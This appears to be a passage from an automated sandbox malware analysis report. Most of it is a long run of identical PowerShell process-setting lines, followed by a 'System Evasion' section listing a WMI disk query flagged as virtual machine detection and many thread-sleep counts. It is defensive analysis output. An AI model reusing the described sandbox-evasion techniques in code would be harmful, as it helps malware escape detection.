        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3733Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2474Jump to behavior
        Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 925Jump to behavior
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 701Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3406Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2861Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6049Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3662Jump to behavior
        Source: C:\Windows\System32\more.comWindow / User API: threadDelayed 958Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6478Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 7743Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 932Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 562Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1333Jump to behavior
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8286Jump to behavior
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 672Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1121Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1250Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1189Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1087Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1318Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1320Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1169Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1287Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 833Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1278Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1281Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1190Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1223Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1229Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1234Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1255Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1176Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1214Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1128Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1112Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1109Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 933
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1005
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1173
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1144
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1188
        Source: C:\Windows\System32\spoolsv.exeWindow / User API: threadDelayed 1181
        Source: C:\Windows\System32\cmd.exeAPI coverage: 9.8 %
        Source: C:\Windows\System32\conhost.exeAPI coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.6 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.5 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.6 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 9.4 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep count: 3733 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep count: 2474 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\cmd.exe TID: 7460Thread sleep time: -46250s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416Thread sleep count: 3406 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416Thread sleep count: 2861 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1140Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6420Thread sleep time: -11068046444225724s >= -30000sJump to behavior
        Source: C:\Windows\System32\more.com TID: 7512Thread sleep count: 958 > 30Jump to behavior
        Source: C:\Windows\System32\more.com TID: 7512Thread sleep time: -47900s >= -30000sJump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 7052Thread sleep count: 6478 > 30Jump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 7052Thread sleep time: -6478000s >= -30000sJump to behavior
        Source: C:\Windows\System32\winlogon.exe TID: 5588Thread sleep count: 263 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 7048Thread sleep count: 7743 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 7048Thread sleep time: -7743000s >= -30000sJump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 4508Thread sleep count: 932 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 4508Thread sleep time: -46600s >= -30000sJump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 7048Thread sleep count: 562 > 30Jump to behavior
        Source: C:\Windows\System32\lsass.exe TID: 7048Thread sleep time: -562000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1948Thread sleep count: 67 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1948Thread sleep time: -67000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3400Thread sleep count: 1333 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3400Thread sleep time: -66650s >= -30000sJump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 3396Thread sleep count: 8286 > 30Jump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 3396Thread sleep time: -8286000s >= -30000sJump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 3272Thread sleep count: 672 > 30Jump to behavior
        Source: C:\Windows\System32\dwm.exe TID: 3272Thread sleep time: -33600s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1788Thread sleep count: 53 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1788Thread sleep time: -53000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1568Thread sleep count: 1121 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1568Thread sleep time: -56050s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2068Thread sleep count: 105 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2068Thread sleep time: -105000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3528Thread sleep count: 1250 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3528Thread sleep time: -62500s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3508Thread sleep count: 97 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3508Thread sleep time: -97000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1272Thread sleep count: 1189 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1272Thread sleep time: -59450s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1288Thread sleep count: 113 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1288Thread sleep time: -113000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 392Thread sleep count: 1087 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 392Thread sleep time: -54350s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 4940Thread sleep count: 1318 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 4940Thread sleep time: -65900s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep count: 97 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep time: -97000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1960Thread sleep count: 1320 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1960Thread sleep time: -66000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2984Thread sleep count: 1169 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2984Thread sleep time: -58450s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep count: 98 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep time: -98000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1840Thread sleep count: 1287 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1840Thread sleep time: -64350s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1864Thread sleep count: 833 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1864Thread sleep time: -41650s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1856Thread sleep count: 100 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1856Thread sleep time: -100000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5356Thread sleep count: 97 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5356Thread sleep time: -97000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6812Thread sleep count: 1278 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6812Thread sleep time: -63900s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1892Thread sleep count: 48 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1892Thread sleep time: -48000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3868Thread sleep count: 1281 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3868Thread sleep time: -64050s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1208Thread sleep count: 1190 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1208Thread sleep time: -59500s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2216Thread sleep count: 97 > 30Jump to behavior
